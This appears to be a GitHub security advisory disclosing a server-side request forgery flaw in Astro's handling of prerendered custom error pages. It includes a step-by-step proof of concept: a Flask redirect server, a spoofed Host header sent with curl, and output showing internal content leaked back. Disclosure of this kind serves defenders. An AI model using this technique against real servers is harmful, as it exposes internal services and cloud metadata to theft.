"details": "### Summary\n\nServer-Side Rendered pages that return an error with a prerendered custom error page (eg. `404.astro` or `500.astro`) are vulnerable to SSRF. If the `Host:` header is changed to an attacker's server, it will be fetched on `/500.html` and they can redirect this to any internal URL to read the response body through the first request.\n\n### Details\n\nThe following line of code fetches `statusURL` and returns the response back to the client:\n\nhttps://github.com/withastro/astro/blob/bf0b4bfc7439ddc565f61a62037880e4e701eb05/packages/astro/src/core/app/base.ts#L534\n\n`statusURL` comes from `this.baseWithoutTrailingSlash`, which [is built from the `Host:` header](https://github.com/withastro/astro/blob/e5e3208ee5041ad9cccd479c29a34bf6183a6505/packages/astro/src/core/app/node.ts#L81). `prerenderedErrorPageFetch()` is just `fetch()`, and **follows redirects**. This makes it possible for an attacker to set the `Host:` header to their server (eg. `Host: attacker.tld`), and if the server still receives the request without normalization, Astro will now fetch `http://attacker.tld/500.html`.\n\nThe attacker can then redirect this request to http://localhost:8000/ssrf.txt, for example, to fetch any locally listening service. The response code is not checked, because as the comment in the code explains, this fetch may give a 200 OK. The body and headers are returned back to the attacker.\n\nLooking at the vulnerable code, the way to reach this is if the `renderError()` function is called (error response during SSR) and the error page is prerendered (custom `500.astro` error page). The PoC below shows how a basic project with these requirements can be set up.\n\n**Note**: Another common vulnerable pattern for `404.astro` we saw is:\n\n```astro\nreturn new Response(null, {status: 404});\n```\n\nAlso, it does not matter what `allowedDomains` is set to, since it only checks the `X-Forwarded-Host:` header.\n\nhttps://github.com/withastro/astro/blob/9e16d63cdd2537c406e50d005b389ac115755e8e/packages/astro/src/core/app/base.ts#L146\n\n### PoC\n\n1. Create a new empty project\n\n```bash\nnpm create astro@latest poc -- --template minimal --install --no-git --yes\n```\n\n2. Create `poc/src/pages/error.astro` which throws an error with SSR:\n\n```astro\n---\nexport const prerender = false;\n\nthrow new Error(\"Test\")\n---\n```\n\n3. Create `poc/src/pages/500.astro` with any content like:\n\n```astro\n<p>500 Internal Server Error</p>\n```\n\n4. Build and run the app\n\n```bash\ncd poc\nnpx astro add node --yes\nnpm run build && npm run preview\n```\n\n5. Set up an \"internal server\" which we will SSRF to. Create a file called `ssrf.txt` and host it locally on http://localhost:8000:\n\n```bash\ncd $(mktemp -d)\necho \"SECRET CONTENT\" > ssrf.txt\npython3 -m http.server\n```\n\n6. Set up attacker's server with exploit code and run it, so that its server becomes available on http://localhost:5000:\n\n```python\n# pip install Flask\nfrom flask import Flask, redirect\n\napp = Flask(__name__)\n\n@app.route(\"/500.html\")\ndef exploit():\n return redirect(\"http://127.0.0.1:8000/ssrf.txt\")\n\nif __name__ == \"__main__\":\n app.run()\n```\n\n7. Send the following request to the server, and notice the 500 error returns \"SECRET CONTENT\".\n\n```shell\n$ curl -i http://localhost:4321/error -H 'Host: localhost:5000'\nHTTP/1.1 500 OK\ncontent-type: text/plain\ndate: Tue, 03 Feb 2026 09:51:28 GMT\nlast-modified: Tue, 03 Feb 2026 09:51:09 GMT\nserver: SimpleHTTP/0.6 Python/3.12.3\nConnection: keep-alive\nKeep-Alive: timeout=5\nTransfer-Encoding: chunked\n\nSECRET CONTENT\n```\n\n### Impact\n\nAn attacker who can access the application without `Host:` header validation (eg. through finding the origin IP behind a proxy, or just by default) can fetch their own server to redirect to any internal IP. With this they can fetch cloud metadata IPs and interact with services in the internal network or localhost.\n\nFor this to be vulnerable, [a common feature](https://docs.astro.build/en/basics/astro-pages/#custom-500-error-page) needs to be used, with direct access to the server (no proxies).",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments